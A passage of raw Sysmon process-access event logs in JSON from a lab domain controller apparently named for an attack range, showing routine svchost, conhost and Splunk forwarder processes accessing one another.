{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010F35D0500}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F35D0500}","TargetProcessId":"4632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.094\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010F35D0500}\r\nSourceProcessId: 4632\r\nSourceThreadId: 4720\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program 